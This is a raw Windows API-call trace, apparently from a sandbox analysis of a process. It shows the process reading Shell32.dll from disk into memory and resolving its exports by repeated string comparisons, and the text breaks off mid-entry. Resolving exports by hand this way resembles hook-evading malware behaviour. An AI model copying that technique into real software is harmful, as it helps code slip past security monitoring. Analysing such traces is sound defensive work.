lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.136] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.136] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0102.137] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0105.927] GetProcessHeap () returned 0x4f0000 [0105.927] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x40b8040 | out: hHeap=0x4f0000) returned 1 [0105.936] GetProcessHeap () returned 0x4f0000 [0105.936] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509150 [0105.936] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0105.936] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0105.937] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0105.937] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0105.937] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0105.937] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0105.937] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0105.937] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0105.937] GetProcessHeap () returned 0x4f0000 [0105.937] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1587258) returned 0x40b3040 [0106.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0106.245] ReadFile (in: hFile=0x140, lpBuffer=0x40b3040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b3040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0110.261] CloseHandle (hObject=0x140) returned 1 [0110.261] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0110.262] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0110.262] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0110.262] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0110.262] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0110.262] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0110.262] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0110.262] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0110.262] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.262] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0110.262] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0110.262] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0110.262] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.263] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0110.263] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0110.263] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0110.263] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0110.263] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.263] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0110.263] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.263] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0110.263] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0110.263] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0110.264] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.264] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0110.264] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0110.264] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.265] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0110.265] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0110.265] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0110.265] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0110.266] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0110.266] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0110.267] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0110.267] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0110.268] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0110.269] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.270] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0110.271] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0110.271] lstrcmpA (lpString1="DAD_AutoScroll", 